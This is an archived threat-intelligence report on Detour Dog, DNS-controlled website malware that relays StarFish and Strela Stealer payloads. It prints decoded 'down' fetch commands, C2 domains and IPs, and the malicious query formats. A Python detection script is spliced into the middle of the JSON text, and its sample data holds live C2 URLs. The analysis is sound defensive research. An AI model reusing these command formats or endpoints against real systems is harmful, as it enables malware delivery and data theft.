{
	"id": "5133a3a6-0647-458c-b2ea-40d410ccd64f",
	"created_at": "2026-04-06T00:14:39.940023Z",
	"updated_at": "2026-04-10T03:23:31.586553Z",
	"deleted_at": null,
	"sha1_hash": "61ee4d2259264c9936cf509052ff3b5a021fd33e",
	"title": "Detour Dog: DNS Malware Powers Strela Stealer Campaigns",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 594562,
	"plain_text": "Detour Dog: DNS Malware Powers Strela Stealer Campaigns\r\nBy Infoblox Threat Intel\r\nPublished: 2025-09-30 · Archived: 2026-04-05 16:26:48 UTC\r\nTens of thousands of websites worldwide are infected with malware that utilizes the Domain Name System (DNS)\r\nto conditionally redirect visitors to malicious content. These DNS requests are made server-side, meaning from the\r\nwebsite itself, and are not visible to the visitor. We have tracked the threat actor that operates this malware since\r\nAugust 2023. The malicious name server conditionally instructs the website to redirect the visitor based on their\r\nlocation and device type. While traditionally these redirects led to scams, the malware has evolved recently to\r\nexecute remote content through the DNS-based command-and-control (C2) system. We are tracking the threat\r\nactor who controls this malware as Detour Dog.\r\nDetour Dog played a major role in campaigns to spread Strela Stealer this summer. In June, we learnt from\r\nexternal researchers that Detour Dog-owned infrastructure was hosting a backdoor malware, StarFish, used to\r\ninstall the information stealer. The domains were seen in malicious email attachments that targeted Germany.\r\nDigging into our own spam collection, we discovered that websites compromised by Detour Dog also appeared to\r\nhost the first stage of the information stealer. Of the confirmed StarFish staging hosts, at least 69 percent were\r\nunder Detour Dog control; the true percentage is likely much higher.\r\nTo our surprise, another system we track via DNS, a MikroTik botnet advertised as REM Proxy, was part of the\r\nattack chain. Strela Stealer is operated by an actor known as Hive0145 and traditionally distributed through\r\nattachments in mass email. The spam seen in June and July was delivered by both REM Proxy and a different\r\nbotnet, Tofsee. 
Detour Dog hosted the first stage of the attack in campaigns from both sources.\r\nBut Detour Dog did more than host the backdoor malware: they helped distribute the stealer via DNS TXT\r\nrecords. The actor-controlled name servers were modified to interpret specially formatted DNS queries from the\r\ncompromised sites and to respond with remote code execution commands. Starting June 8, we saw responses from\r\nthe servers that directed the infected site to fetch the output of PHP scripts from verified Strela Stealer C2 servers.\r\nThese covert communications point to a malware distribution system in which DNS acts as both a command\r\nchannel and a delivery mechanism. A setup like this lets the attacker hide behind compromised websites, which\r\nmakes the operation more resilient, and misleads threat hunters, because the stage is not actually hosted where the\r\nanalyzed attachments point.\r\nThis marks the first time Detour Dog is known to deliver malware to home users.\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 1 of 13\n\nFor years, Detour Dog exclusively forwarded traffic to Los Pollos. In late November 2024, that changed. The\r\nservers began redirecting visitors to Help TDS, which in turn routed traffic via Monetizer TDS. In those flows we\r\nobserved malicious campaigns operated by third-party affiliates. While the advertising network utilized by Detour\r\nDog changed, the outcome did not.\r\nThe website malware fundamentally advanced in spring 2025. The actor added a new capability to command\r\ninfected websites to execute code from remote servers. Responses to TXT record queries are Base64-encoded and\r\nexplicitly include the word “down” to trigger this new action. 
We believe this has created a novel networked\r\nmalware distribution model using DNS in which the different stages are fetched from different hosts under the\r\nthreat actor’s control and are relayed back when the user interacts with the campaign lure, for example, the email\r\nattachment.\r\nTo our knowledge, this technique, shown in Figure 1, has not been reported. Through this method, the actor\r\nmisdirects defenders and obfuscates the true location of the malware. With a large network of infected hosts, this\r\nmight be considered a three-card monte version of malware distribution.\r\nFigure 1. Diagram of theorized attack chain utilizing DNS TXT records for C2\r\nMost of the time, when a user visits one of the sites, they see the original site. In some cases, they will be\r\nredirected to a scam via Help TDS. But in rare cases, the site will receive a remote file execution command. The\r\nfact that most of the time there is no apparent compromise of the site, and that it is difficult to reproduce malicious\r\nredirections, allows Detour Dog to persist. We have seen sites infected for over a year. When combined with the\r\nnew remote execution feature, the ways in which the threat actor can deliver malicious content are complex. The\r\nattack chains currently known to utilize Detour Dog-controlled assets are shown in Figure 2.\r\nFigure 2. Multiple attack vectors utilize Detour Dog-controlled assets\r\nDetour Dog operations appear to extend beyond the DNS C2 website malware. We unwound the history of Detour\r\nDog back to February 2020, well before the website malware was discovered. 
Detour Dog handcrafts tracking\r\nidentifiers that are carried across multiple traffic distribution systems (TDSs), which allowed us to connect\r\nseemingly independent activity over long periods of time.\r\nWe have attempted to disrupt Detour Dog through abuse reporting. In August 2025, after the registrar WebNIC\r\nrefused to suspend the active DNS C2 server, webdmonitor[.]io, the Shadowserver Foundation sinkholed the\r\ndomain. This gave us a fresh look at the infected websites, as well as the actor’s ability to respond to the\r\ndisruption. It took Detour Dog only a few hours to establish a new C2 and regain control of the infected sites.\r\nA week later, Shadowserver sinkholed the second domain and provided us with over 39 million DNS TXT queries\r\nto analyze. Approximately 30,000 infected hosts, within 584 top-level domains (TLDs), were seen in a 48-hour\r\nwindow. The queries show a significant amount of bot traffic; at its peak, the sinkhole received 2 million TXT\r\nrequests in an hour and included encoded IP addresses that didn’t correspond to natural human traffic. While bot\r\ntraffic is a known plague in affiliate advertising, the sheer volume was astonishing. We will dig into the details\r\nlater in the section entitled Sinkholing the C2 Domain.\r\nDNS queries hint that Detour Dog is still maturing remote file execution capabilities. Currently, evidence suggests\r\nthat Detour Dog and Hive0145 are distinct actors. It’s possible, based on history from the last four years, that\r\nDetour Dog is providing a service to others, in which case Hive0145 may just be the first partner to receive\r\nmalware distribution support via the network of infected hosts.\r\nDNS TXT C2\r\nDetour Dog-infected websites make queries to the DNS C2 using a subdomain that includes user information. 
The\r\nquery format has changed slightly over the last few years but retains the same general structure:\r\n\u003cinfected-host\u003e.\u003cvisitor-ip\u003e.\u003crand-num\u003e.\u003ctype\u003e.c2_domain\r\nwhere the “type” is not always present. Initially, these queries were client-side, but changed to server-side in\r\nApril 2024. With this change, the actor began encoding information about the client device type, for example, “ni”\r\nfor iPhone. We have seen several values in the “type” field over the last few years.\r\nMost of the time, Detour Dog instructs the infected site to display its original content, that is, “do nothing.” We\r\nanalyzed over 4 million TXT records from the C2 server, which is the authoritative server for the C2 domain,\r\nrecorded between August 6 and August 8. The responses were distributed as shown in Figure 3. Queries to the\r\nserver include a very high volume of bot traffic; however, we haven’t observed a consistent pattern for which the\r\nserver responds with a redirect. We suspect they limit redirections in part to avoid detection.\r\nFigure 3. Detour Dog responses August 6-8 to queries from infected hosts\r\nThe TXT responses are Base64 encoded and currently have the form\r\nhttps://\u003credirector_domain\u003e/?\u003calphanumeric_string\u003e\r\nwhere the alphanumeric string changes in each response. This redirector has no filtering logic and has exclusively\r\nredirected to Help TDS URLs since November 20, 2024. Table 1 shows the redirector domains observed in 2025.\r\nThese domains were traditionally hosted with Cloudflare, allowing them to hide their true IP address. 
However,\r\nafter multiple disruptions, the actor began to openly run their servers, most recently in IP space belonging to\r\nKazakhstan (93[.]152[.]230[.]52).\r\nRedirector Domain | First Seen | Last Seen\r\ninfosystemsllc[.]com | August 1, 2024 | April 1, 2025\r\necomicrolab[.]com | December 8, 2024 | June 10, 2025\r\nflow-distributor[.]com | June 15, 2025 | July 15, 2025\r\nadvertipros[.]com | June 10, 2025 | Now\r\nTable 1. Domains contained in TXT record responses since January 2025\r\nOn April 1, 2025, a new type of TXT record response was identified, with the answer of\r\n“ZG93bmh0dHBzOi8vdGhpbmtwYWR3b3JrLmNvbS9kb3du”, which decodes to\r\n“downhttps://thinkpadwork.com/down”, and the server continued to occasionally respond like this to requests\r\nuntil June 26, 2025. Unfortunately, we were unable to determine what this URL hosted. The domain\r\nthinkpadwork[.]com was registered January 23, 2025, and uses Cloudflare name servers.\r\nThe “down” command instructs the infected site to request the specified URL with curl and pass the output of the\r\nrequest into the body of the response to the victim. In the case of a PHP endpoint, the PHP script is executed on\r\nthe C2 server and the output is received by the compromised server and passed back to the victim.\r\nEnter StarFish Backdoor and Strela Stealer\r\nStrela Stealer is an information stealer first observed in late 2022. The operators, known as Hive0145, target\r\nEuropean countries, primarily Germany, using broadly distributed email that includes a malicious file. This\r\nsummer, malicious SVG attachments were used to download a reverse shell backdoor malware called StarFish.\r\nIBM X-Force and other researchers witnessed cases where StarFish then downloaded Strela Stealer.\r\nTo our surprise (and delight?), the latest reporting from IBM included a Detour Dog redirector domain,\r\nadvertipros[.]com. 
This sample, an SVG file submitted to VirusTotal that was found in spam using German-language\r\nlures about outstanding invoices, makes the following call to fetch the next stage:\r\nhxxps://advertipros[.]com//?u=script\r\nThis meant that Detour Dog domains were used to host malware, in addition to redirecting website visitors to\r\nscams. We set out to see if we could verify this with our own data. For months, we have tracked a spam botnet of\r\ncompromised MikroTik routers via DNS, which we now know, based on Black Lotus research, to be REM\r\nProxy. Using our own spam collection, we located multiple samples of Strela Stealer SVG distribution and\r\ndiscovered that they were all distributed by REM Proxy, confirming that Hive0145 is a customer of REM Proxy.\r\nOther external researchers reported spam delivered through the botnet Tofsee.\r\nSamples in our spam collection led victims to download malware from domains compromised by Detour Dog. As\r\nan example, this SVG attachment downloaded StarFish from ywcanevada[.]org. But a scan of the domain in\r\nurlscan has the telltale signs of a Detour Dog infection: visiting the domain led to a redirection through flow-distributor[.]com and on to Help TDS.\r\nAt this point in our investigation, we knew that the threat actor was hosting malware connected to Strela Stealer\r\nfrom their own infrastructure and that the same files were hosted on infrastructure they had compromised. Then\r\nwe discovered more connections between Detour Dog and Strela Stealer.\r\nTXT Record Connections\r\nWhen StarFish executes, it starts regular communication with the malware C2 server, exfiltrating data from the\r\nhost until it is told to stop. According to IBM, it does this by connecting to a hardcoded C2 server with the\r\n“server.php” endpoint and passing a unique identifier for the compromised machine. 
The server responds with\r\n“OK” and an optional command. If the string “%SCRIPT%” is included in the response, it gets converted to the\r\nlocal path of the reverse shell. The infected device responds via POST requests to the server.\r\nDetour Dog also included the StarFish C2 in TXT responses. On June 8, we saw the following response in\r\ndecoded records:\r\ndownhttp://176[.]65[.]138[.]152/script.php?u=j6cwaj0h67\r\nThis IP address was found in a public submission to ANY.RUN on June 10, 2025, that included an obfuscated\r\nJavaScript file. The script attempted to call out to an https[:]//176[.]65[.]138[.]152/server.php endpoint. The IP\r\naddress is also seen in a number of JavaScript files submitted to VirusTotal, which are categorized as remote\r\naccess trojans.\r\nThe URLs contained within TXT responses are slightly different from those reported for the stealer; they contain a\r\nscript.php endpoint and a “u” parameter. The DNS query that triggered this response incorporates new values for\r\nthe “type,” for example:\r\n\u003cinfected-host\u003e.\u003cip-address\u003e.\u003crand\u003e.nwuuj6cwaj0h67.webdmonitor[.]io\r\nThe traditional two-letter values for the device type were replaced with a string that must be parsed by the name\r\nserver to respond correctly. If the query includes a type value of the format \u003cna|nw|nd\u003euu\u003cvalue\u003e, the server will\r\ninterpret this and return an endpoint on the malware C2 server. If the query contains “nwuuscript”, the response\r\nhas no additional parameter:\r\ndownhttp://updatemsdnserver[.]com/script.php\r\nIn addition to script.php, we have seen file.php returned in TXT records from June 11 to July 25, 2025, when the\r\nquery includes “nauufile”.\r\nIn the Strela Stealer attack chains we analyzed, “script” and “file” are parameters seen in requests sent to\r\ncompromised sites, originally initiated by the StarFish downloader, in the first and second stages respectively. 
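The query and response formats described above, including the newer \u003cna|nw|nd\u003euu\u003cvalue\u003e type labels, as an added Python example that is not Infoblox code and not the malware itself: it parses Detour Dog-style query names, Base64-decodes TXT answers, separates redirector URLs from 'down' commands, and turns each query/answer pair into a finding that a DNS log pipeline could alert on. The C2 domain list, the treatment of the encoded visitor IP as a single opaque label, and the assumption that rand-num is all digits are mine, not the report's; the sample rows are constructed, with only the URLs and the one Base64 answer quoted in the report taken from the page.

```python
import base64
import binascii
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Added example, not code from the Infoblox report or from the malware.
# It decodes Detour Dog style DNS TXT C2 traffic as the report describes it:
#   query name : <infected-host>.<visitor-ip>.<rand-num>.<type>.<c2-domain>
#   TXT answer : Base64 of https://<redirector>/?<string>  (redirect)
#                or of down<url>                            (remote fetch)
# Assumptions not stated in the report: the C2 domain list below, that the
# encoded visitor IP occupies exactly one label, and that rand-num is all digits.
C2_DOMAINS = ('webdmonitor.io', 'aeroarrows.io', 'airlogs.net', 'cdn-routing.com')
COMMAND_PREFIXES = ('na', 'nw', 'nd')   # the report lists <na|nw|nd>uu<value>


@dataclass
class C2Query:
    infected_host: str
    visitor_ip: str          # opaque encoded label; the report does not give the encoding
    rand: str
    qtype: Optional[str]     # e.g. ni (device type) or nwuuscript (command request)
    c2_domain: str

    def command_value(self) -> Optional[str]:
        # New style types are <na|nw|nd>uu<value>; value is script, file, test or an id
        t = self.qtype or ''
        if len(t) > 4 and t[:2] in COMMAND_PREFIXES and t[2:4] == 'uu':
            return t[4:]
        return None


def parse_query(qname: str) -> Optional[C2Query]:
    name = qname.strip().rstrip('.').lower()
    for c2 in C2_DOMAINS:
        if name.endswith('.' + c2):
            labels = name[: -len(c2) - 1].split('.')
            break
    else:
        return None                      # not a query to a tracked C2 domain
    qtype = None
    if labels and not labels[-1].isdigit():   # trailing non-numeric label is the type field
        qtype = labels[-1]
        labels = labels[:-1]
    if len(labels) < 3 or not labels[-1].isdigit():
        return None                      # rand-num must be present and numeric
    rand, visitor_ip = labels[-1], labels[-2]
    return C2Query('.'.join(labels[:-2]), visitor_ip, rand, qtype, c2)


@dataclass
class C2Response:
    kind: str                # noop, redirect, down or unknown
    url: Optional[str]


def decode_txt(txt: str) -> C2Response:
    data = txt.strip().strip(chr(34))    # drop surrounding quotes from dig style output
    if not data:
        return C2Response('noop', None)  # assumption: empty answer means show original site
    try:
        plain = base64.b64decode(data, validate=True).decode('utf-8')
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return C2Response('unknown', None)
    if plain.startswith('down'):
        return C2Response('down', plain[4:])          # strip the literal command word
    if plain.startswith('https://') or plain.startswith('http://'):
        return C2Response('redirect', plain)
    return C2Response('unknown', None)


def triage(records: List[Tuple[str, str]]) -> List[Dict[str, Optional[str]]]:
    # One finding per query/answer pair. Remote fetch commands are the ones to
    # page on: the infected site will curl that URL server side and relay the output.
    findings = []
    for qname, txt in records:
        q = parse_query(qname)
        if q is None:
            continue
        r = decode_txt(txt)
        severity = 'high' if r.kind == 'down' else ('medium' if r.kind == 'redirect' else 'info')
        findings.append({'infected_host': q.infected_host, 'encoded_ip': q.visitor_ip,
                         'type': q.qtype, 'command_value': q.command_value(),
                         'kind': r.kind, 'url': r.url, 'severity': severity})
    return findings


def b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample rows mimicking passive DNS output. The label c0a80101 is a
# stand in for the unknown IP encoding; the URLs are the ones the report quotes.
SAMPLE = [
    ('yy.ua.c0a80101.48213.ni.webdmonitor.io', b64('https://advertipros.com/?Ab12Cd34')),
    ('yy.ua.c0a80101.77310.nwuuj6cwaj0h67.webdmonitor.io', b64('downhttp://176.65.138.152/script.php?u=j6cwaj0h67')),
    ('yy.ua.c0a80101.5.nauufile.webdmonitor.io', b64('downhttp://updatemsdnserver.com/file.php')),
    ('yy.ua.c0a80101.91.webdmonitor.io', ''),
    ('www.example.org.c0a80101.12.ni.aeroarrows.io', 'ZG93bmh0dHBzOi8vdGhpbmtwYWR3b3JrLmNvbS9kb3du'),
    ('www.example.org.c0a80101.13.ni.aeroarrows.io', 'not base64 at all!'),
    ('www.example.org.c0a80101.14.ni.example.net', b64('https://advertipros.com/?x')),
]

if __name__ == '__main__':
    for finding in triage(SAMPLE):
        print(finding)
```

Run directly, the script prints one finding per sample row (the example.net row is ignored because it is not a tracked C2 domain). In practice SAMPLE would be replaced by TXT query/answer pairs from passive DNS or resolver logs; the 'down' findings are the ones to escalate, and the command_value field tells you whether the site was asked for script.php, file.php, a test, or an id-bearing URL.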
This was the case, for example, in the REM Proxy emails within our spam collection. We consulted Golo Mühr, a\r\nresearcher at IBM X-Force who tracks Hive0145 and Strela Stealer. Golo speculated that the files could\r\npotentially include the decoy and the Strela payload. He clarified that the C2 server is used for all other parts of\r\nthe operation except staging StarFish.\r\nThese returns were a bit of a mystery, as we were unable to fetch the scripts ourselves; however, IBM X-Force\r\nalerted us to a campaign they observed in July 2025, targeting Ukrainian government domains (gov[.]ua), that used\r\nscript.php and file.php endpoints. Unlike the operation by Hive0145 that leveraged Detour Dog infrastructure to\r\nobscure C2 locations, this campaign sent victim traffic directly to updatemssoft[.]com, which was hosted at the\r\nsame IP address as updatemsdnserver[.]com. Although the updatemssoft[.]com domain was not seen in Detour\r\nDog TXT responses, use of the file.php and script.php endpoints here was linked to StarFish/Strela staging.\r\nExamples of the malware samples used in this campaign can be seen here:\r\nhttps://www.virustotal.com/gui/domain/updatemssoft.com/relations.\r\nWe do have a theory based on his input. The sequence of events as shown in Figure 1 could explain the behavior:\r\n1. Initial Trigger\r\nThe victim opens a malicious document (e.g., a fake invoice), which launches an SVG file that calls out to\r\nan infected domain using the u=script parameter.\r\n2. DNS TXT Query\r\nThe infected site sends a TXT record request to the Detour Dog C2 server via DNS. The query includes a\r\ntype identifier like nwuuscript+{random string}, where the random string likely serves as a unique\r\nidentifier.\r\n3. C2 URL Response\r\nThe name server responds with a TXT record containing a Strela C2 URL, prefixed with down.\r\nExample: downhttp://updatemsdnserver.com/script.php?u={random string}\r\n4. Payload Retrieval\r\nThe infected site strips the down prefix and uses curl to fetch the next-stage payload from the Strela C2\r\nserver. We suspect the output of this request to script.php is the StarFish downloader. Because the curl\r\nrequest occurs server-side, it is not visible to the visitor.\r\n5. Payload Delivery\r\nThe compromised site acts as a relay for the C2, passing the output from the C2 server to the client. One\r\nhint that server-side commands are occurring is shown in this example, where the URL redirects to itself\r\nrepeatedly before displaying the StarFish downloader script.\r\nExample at: https://urlscan.io/result/019782b4-1f1f-7718-a9a4-246596e0ecb1\r\n6. Second Stage Callout\r\nThe downloader script initiates another callout to a different compromised domain, this time using the\r\nu=file parameter.\r\n7. Second DNS TXT Query\r\nThe second compromised site sends a similar DNS TXT query to the Detour Dog C2 server, now using\r\nnwuufile+{random string}.\r\n8. Second C2 URL Response\r\nThe Detour Dog name server responds with a new Strela C2 URL pointing to file.php, again prefixed with\r\ndown.\r\n9. Second Payload Retrieval\r\nThe compromised site strips the prefix and initiates another curl request to the Strela C2 server, this time\r\nreceiving a file in the response.\r\n10. Second Payload Delivery\r\nThe second compromised site relays the file to the client. 
The payload is a .zip archive containing a\r\nwscript trojan, believed to be StarFish; see the VirusTotal report here.\r\nExample at: https://urlscan.io/result/0197f99f-45fd-75f4-be91-a5529e8c6168\r\nThis theory would indicate that the attack cleverly leverages DNS as a covert channel to orchestrate a multi-step\r\ndelivery process. URLs embedded in DNS TXT records are used to fetch staged payloads—first a downloader\r\nscript, then a ZIP file—all relayed back to the victim via compromised infrastructure. Passive DNS logs include\r\nmany TXT queries with the phrase “test” embedded into the type string, indicating that the threat actor is\r\ncontinuing to evolve and perfect the system.\r\nWe also saw these domains in similar TXT record responses:\r\nnupdate0625[.]com\r\nmsdnupdate[.]com\r\nThe IP address used by updatemsdnserver[.]com, 95[.]164[.]123[.]57, also hosted:\r\nmssoftupdateserver[.]com\r\ndomainzone123[.]com\r\nupdatemssoft[.]com\r\nFigure 4 shows the overlap between Detour Dog TXT responses and known Hive0145 infrastructure, with specific\r\nexamples of known domains.\r\nFigure 4. Diagram of overlap in Detour Dog and some Hive0145 (StarFish/Strela Stealer) C2 infrastructure\r\nWhat’s Detour Dog All About?\r\nWe’ve been hunting this website malware using DNS for over two years. Bulletproof hosting and registrars, in\r\ncombination with the cloaked nature of Detour Dog’s activity, have allowed infections to persist on sites for very\r\nlong periods of time. When they moved from the scam delivery business to the information stealer business, we\r\ndoubled our efforts to trace the threat actor’s history.\r\nEarlier this year, we demonstrated that the DNS TXT C2 domains broke into two distinct sets. Each of these sets\r\nhas distinct hosting and redirection patterns. 
Detour Dog refers to the actor who controls the larger set of\r\ndomains, including those shown in Table 2 as well as those we have previously reported. We have not seen the\r\nsmaller set since December 2024, and we are unable to definitively tie them to Detour Dog although they\r\noutwardly appear the same.\r\nC2 Domain | First Seen | Last Seen\r\naeroarrows[.]io | August 1, 2025 | August 6, 2025\r\nairlogs[.]net | April 23, 2024 | Current\r\ncdn-routing[.]com | July 8, 2024 | Current\r\nwebdmonitor[.]io | October 7, 2024 | July 28, 2025\r\nTable 2. C2 domains observed with remote file URLs in TXT records\r\nWe originally attributed Detour Dog to the Los Pollos affiliate identified in push monetization links by\r\n“CHiI7Gh3GUyTa8XGgNqDyQ”. Specifically, this value was seen in URLs returned by Detour Dog for the “pl”\r\nparameter; we believe these are Taco Loco links. This affiliate id was first seen in public sources on August 20,\r\n2023, consistent with initial reporting of the use of TXT records. The second, possibly unrelated, DNS C2 set\r\ncontains a Los Pollos affiliate id, pe7k605, that dates to December 2019.\r\nMore recently, we extended our understanding of Detour Dog by locating attack chains that included both the\r\nknown Detour Dog redirector domains and a Los Pollos affiliate id, bt1k60t. This affiliate id predates the use of\r\nDNS TXT records as a control mechanism and was only exposed for a few days while Detour Dog migrated from\r\none TDS to another, but these few days allowed us to unwind several years of the threat actor’s operations.\r\nTo explain how we unraveled the Detour Dog campaigns, we need to provide a little history of the change. On\r\nNovember 13, 2024, Qurium disclosed that Russian Doppelgänger disinformation campaigns leveraged Los\r\nPollos to disguise their operations. 
Shortly after, Los Pollos announced to their affiliates that they were suspending\r\ntheir “push monetization” vertical. This vertical served fake CAPTCHAs that duped users into accepting browser\r\nnotifications, creating a persistent mechanism to deliver scams to a device.\r\nOn November 17, Detour Dog routed site visitors to Help TDS, which then forwarded them to Los Pollos, where\r\nthey received the fake CAPTCHA per usual. This change, visible in a public scan, provided critical clues to\r\nunderstanding the actor. In affiliate advertising platforms, there are unique identifiers for publishing affiliates (i.e.,\r\nthose who source traffic for the platform). Additionally, there are often parameters that can be set by the affiliate to\r\ntrack their own campaigns. Figure 5 shows the redirection chain from Detour Dog on that date. This series of\r\nredirects shows that following a visit to the infected site:\r\n- The Detour Dog C2 redirected the user to infosystemsllc[.]com, which in turn redirected them to the Help TDS, as identified by the “help” path.\r\n- The user entered the Help TDS with the affiliate id 32161731835980 and was redirected to a Los Pollos domain, incomehub-your[.]on.\r\n- Detour Dog configured the t (tracker) and cid (click id) parameters of their Los Pollos link to include cid:11005.\r\n- The Los Pollos link also includes the affiliate id bt1k60t, and the site is redirected to another domain, braraildye[.]live, hosted in Hetzner, which we believe is part of Taco Loco.\r\n- The chain redirects through AS6898/AS5398, then through Amazon, before finally leading to a decoy page at Google.\r\nFigure 5. A Detour Dog redirect chain through Help TDS and Los Pollos, seen on November 17, 2024. This is the\r\nfirst time cid=11005 is observed in a Los Pollos smartlink. 
Credit urlscan[.]io.\r\nThe redirection chain in Figure 5 associates Detour Dog with the Help TDS affiliate id 32161731835980 and the\r\nLos Pollos affiliate id u=bt1k60t. This is also the first known time that the value “cid:11005” is used as a tracking\r\nparameter (t=) in a Los Pollos URL. Over the next few days, this behavior of redirecting through Help TDS to Los\r\nPollos via these same affiliate ids continued.\r\nOn November 20, Detour Dog attack chains shifted to what they are today. Figure 6 shows a redirection chain\r\nfrom that date:\r\n- Detour Dog redirects the infected site visitor to infosystemsllc[.]com, which immediately redirects to Help TDS.\r\n- The Help TDS affiliate id is 32161731835980, and that causes a redirection to Monetizer TDS.\r\n- The Monetizer URL contains “utm_campaign=cid:11005”, the exact value previously used by Los Pollos affiliate u=bt1k60t.\r\n- The Monetizer URL contains a cid structured identically to that of the Los Pollos TDS.\r\nFigure 6. A Detour Dog redirect chain through Help TDS and Monetizer, seen on November 20, 2024. The\r\nMonetizer cid value is constructed identically to the Los Pollos value seen on November 17th. Credit urlscan[.]io\r\nThese scans imply that Detour Dog controlled the Los Pollos affiliate id bt1k60t. We discovered that Detour Dog\r\noperations began well before DNS TXT records were used as a C2. The earliest known activity occurred on\r\nFebruary 27, 2020, and the last time that affiliate id was observed was December 11, 2024. But using ids across\r\naffiliate programs and unusual tracker values, we uncovered more of the threat actor’s activity.\r\nDuring the entire time that Detour Dog was an affiliate of Los Pollos, they were also an affiliate of Help TDS.\r\nDetour Dog uses a unique cid value for each Help TDS affiliate id. For example, cid:10 was used exclusively with\r\nHelp TDS affiliate 51577283903. 
Combining the known Los Pollos and Taco Loco affiliate ids with the Help TDS\r\nvalues, we created a composite view of Detour Dog campaigns between February 2020 and September 18 of this\r\nyear, shown in Figure 7.\r\nFigure 7. Timeline of Detour Dog flows observed via Los Pollos, Help TDS, and Monetizer, as tracked through\r\naffiliate ids and custom cid values. Details as of September 18, 2025. The logos shown are logos of the affiliate\r\nnetworks used by the actor. This timeline is created through analysis of data from urlscan[.]io and Infoblox Threat\r\nIntel independent open-source research.\r\nAnalysis uncovered other affiliate ids associated with Detour Dog, but their patterns remained consistent over the\r\nlast five and a half years. It is unknown whether Detour Dog is a service provider or simultaneously operating\r\ncampaigns of their own. While there is a one-to-one match between their Help TDS affiliate id and cid values, Los\r\nPollos and Taco Loco affiliate ids are used across multiple cid values.\r\nDetour Dog uses bulletproof providers, but we collaborated with the Shadowserver Foundation to disrupt their\r\nDNS C2 not just once, but twice in August 2025.\r\nSinkholing the C2 Domain\r\nWe reported the Detour Dog domain, webdmonitor[.]io, to the registrar, WebNIC, on June 24, 2025. In a series of\r\n16 email exchanges, we explained to the registrar how the website malware operated and its importance within\r\nthe threat landscape. After WebNIC responded “We have notified the respective parties to investigate and take the\r\nnecessary action” on June 26, we expected the domain to be suspended. It was not. We continued to pressure the\r\nregistrar to act. We also reached out to the .io registry and did not receive a response. 
On July 22, despite our\r\ndemonstration of how to trigger a response from the malicious name server, WebNIC responded:\r\n“While we acknowledge that the registrar is not responsible for the content hosted on a third-party site, registrars\r\nare responsible for responding to well-documented complaints involving domain name abuse. In this context, we\r\nalso rely on respective parties and supporting evidence to investigate and take appropriate action. That said, based\r\non our current assessment, the domain in question has remained inactive and has not shown any recent hosting or\r\nweb activity for a considerable period.”\r\nDuring our four-week exchange, WebNIC acknowledged abuse but then accepted their customer’s word that no\r\nmalicious activity took place. They repeatedly responded with irrelevant answers, such as providing IPv4 (A)\r\nrecord responses instead of TXT responses. They did not place the domain on a client hold to suspend it at any\r\npoint. In our view, WebNIC’s responses were inadequate to address the reported abuse. ICANN independently\r\nsent WebNIC a notification on July 29, 2025, for breach of the Registrar Accreditation Agreement.\r\nOn July 30, the Shadowserver Foundation sinkholed the domain. Within hours, Detour Dog had replaced the C2\r\ndomain with aeroarrows[.]io, again registered with WebNIC. On August 6, Shadowserver sinkholed the new C2\r\nand provided us with over 39 million queries received over approximately 48 hours to analyze.\r\nDespite the brief collection window, this dataset surfaced compelling insights into the campaign’s global footprint.\r\nWe observed approximately 30,000 unique domains spanning 584 distinct TLDs, all generating properly crafted\r\nDNS TXT queries to aeroarrows[.]io via web traffic originating worldwide. 
Within this set, just under 1% were\r\nqueries with the new longer “type” associated with download commands.\r\nWe reviewed both the IP address distribution of the encoded “visitor” and that of the infected sites. The sheer\r\nvolume of queries in such a short time indicated bot traffic. Within the IP addresses included in the queries, 89\r\ncountries were represented. The United States, Germany, and Taiwan stood out by unique IP volume, with the\r\nUnited States alone accounting for 37% of all the IP addresses identified visiting the compromised sites. But the\r\ndata was heavily skewed as well: two IP addresses alone accounted for nearly 3 million queries. The reason for\r\nthis is a mystery.\r\nUsing the infected hostnames, we also looked at the hosting services and countries. Consider the infected site\r\nyy[.]ua, which we used as an example in Step 5 of our theorized attack chain earlier in this paper. There were\r\nnearly 2,500 queries for this domain in the collection. For several years, this site has shown content for a law\r\noffice in Moscow, but starting in June 2025, it was observed many times in urlscan submissions. In one case, it has\r\nthe telltale Detour Dog redirection signature, but in many others the submission URL contains u=script or u=file.\r\nSurprisingly, the percentage of download-style queries for yy[.]ua is much higher than average: a whopping 30%\r\nof the queries for the domain. Of these, the vast majority contained “nwuutest”, and we are unsure what the “test”\r\nmay indicate. But over a hundred queries were for the script or file endpoints. Traditionally, the IP address\r\nencoded in the query was that of the website visitor, but the sinkhole data not only demonstrates large volumes of\r\nautomated traffic but presents a mystery in how the queries related to the new type are created. The encoded IPs\r\nincluded addresses that are unlikely to be connected to human users, such as ones belonging to the U.S.\r\nDepartment of Defense. 
For example, 29[.]87[.]121[.]154, 215[.]226[.]38[.]106, and 33[.]35[.]245[.]179 were all\r\nseen in queries; the likelihood of these being a source of human traffic is very low.\r\nHow was this enormous volume of queries generated? Why does it contain IP addresses that don’t relate to human\r\nusers? These are mysteries that might be resolved with direct access to the malware on the sites.\r\nFind our released threat indicators for Detour Dog, Strela Stealer, and other threats on our GitHub here.\r\nNote: Entities, brands, and intermediaries are mentioned in this report because telemetry or public records link\r\nthem to the observed redirection chains. Mention alone does not imply knowledge of or participation in unlawful\r\nactivity.\r\nSource: https://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/"
	],
	"report_names": [
		"detour-dog-dns-malware-powers-strela-stealer-campaigns"
	],
	"threat_actors": [
		{
			"id": "28349be5-ce76-4a45-9502-707953dd2f07",
			"created_at": "2025-05-29T02:00:03.210059Z",
			"updated_at": "2026-04-10T02:00:03.86427Z",
			"deleted_at": null,
			"main_name": "HIVE-0145",
			"aliases": [
				"Hive0145"
			],
			"source_name": "MISPGALAXY:HIVE-0145",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434479,
	"ts_updated_at": 1775791411,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
